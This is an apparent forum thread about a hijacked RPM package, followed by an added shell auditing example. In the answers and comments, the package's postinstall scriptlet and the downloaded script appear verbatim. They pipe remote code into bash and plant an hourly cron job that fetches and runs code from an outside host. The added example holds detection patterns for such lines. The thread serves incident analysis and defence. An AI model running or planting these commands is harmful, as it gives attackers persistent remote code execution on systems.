How did installing this RPM create a file?
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:

    # rpm -ql getpagespeed-extras-release
    /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
    /etc/yum.repos.d/getpagespeed-extras.repo
    # rpm -qf /etc/cron.d/sysstat2
    file /etc/cron.d/sysstat2 is not owned by any package

How did the RPM create the file and how do I see what else it did?

centos7 yum rpm

asked 8 hours ago by Pascal

Comments:

So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley, 6 hours ago

The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal, 6 hours ago

And it's signed by them, too?
– Aaron Copley, 6 hours ago

I don't know how to find that out.
– Pascal, 6 hours ago

https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.
– Pascal, 6 hours ago

2 Answers

    # rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
    warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
    postinstall scriptlet (using /bin/sh):
    curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php contains:

    #!/bin/bash
    ### hacked by rpowned
    # bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
    echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2

answered 6 hours ago by Pascal

You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.

rpm cannot completely track what happened because it is running an arbitrary script.

gpgcheck will not help you; both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:

    $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
    pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
    sub 2048R/059A9010F4F3567D 2017-03-03
    $ rpm -K getpagespeed-extras-*
    getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
    getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.

It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately it almost seems necessary if packages do ill-advised tricks like this.

answered 4 hours ago by John Mahowald

Comments:

The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal, 4 hours ago

Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal, 3 hours ago
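
The two checks this thread arrives at, as an added example that is not part of the original posts: `audit_scriptlets` scans the text printed by `rpm -qp --scripts` for downloads piped into a shell and for writes into cron directories, and `unowned_files` lists files that `rpm -qf` attributes to no package. The function names, rule names and the sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original thread. Rule names are made up here.

# audit_scriptlets: read the text printed by "rpm -qp --scripts PACKAGE.rpm"
# on stdin, print "RULE<TAB>SECTION<TAB>LINE" per finding, return 1 if any.
audit_scriptlets() {
    awk '
    BEGIN {
        # download piped straight into a shell: curl ... | bash
        fetch_pipe  = "(curl|wget)[^|]*[|][ \t]*(sudo[ \t]+)?(ba|da|z)?sh([ \t;]|$)"
        # shell reading a download via process substitution: bash <(curl ...)
        fetch_subst = "(ba|z)?sh[ \t]+<[(][ \t]*(curl|wget)"
        # output redirected into a cron directory
        cron_write  = ">>?[ \t]*/(etc/cron|var/spool/cron)"
        section = "unknown"; findings = 0
    }
    # Section headers, e.g. "postinstall scriptlet (using /bin/sh):"
    /^[a-z]+ (scriptlet|program)/ { section = $1; next }
    # Comment lines are not executed, so they are not reported
    /^[ \t]*#/ { next }
    {
        if ($0 ~ fetch_pipe)  report("FETCH_PIPE_SHELL")
        if ($0 ~ fetch_subst) report("FETCH_PROC_SUBST")
        if ($0 ~ cron_write)  report("WRITES_CRON")
    }
    function report(rule) {
        printf "%s\t%s\t%s\n", rule, section, $0
        findings++
    }
    END { exit (findings > 0) }
    '
}

# unowned_files: print every regular file under the given directories that
# "rpm -qf" does not attribute to an installed package. Files written by a
# scriptlet (such as the cron file in the question) show up here.
unowned_files() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f | sort | while IFS= read -r f; do
            rpm -qf "$f" >/dev/null 2>&1 || printf '%s\n' "$f"
        done
    done
}

# Constructed sample shaped like the scriptlet output quoted in the thread;
# repo.example is a placeholder host.
sample_scriptlets() {
    cat <<'EOF'
preinstall scriptlet (using /bin/sh):
getent group demo >/dev/null || groupadd -r demo
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://repo.example/post-install.php 2>/dev/null | bash >/dev/null 2>&1
EOF
}

# Before installing: rpm -qp --scripts PACKAGE.rpm 2>/dev/null | audit_scriptlets
sample_scriptlets | audit_scriptlets || echo "scriptlets need review before install" >&2

# After the fact, on an RPM-based host: sweep the cron directories.
if command -v rpm >/dev/null 2>&1; then
    unowned_files /etc/cron.d /etc/cron.hourly /etc/cron.daily
fi
```

A clean result from `audit_scriptlets` only means none of these three patterns matched; the scriptlet text still deserves a read before the package is installed as root.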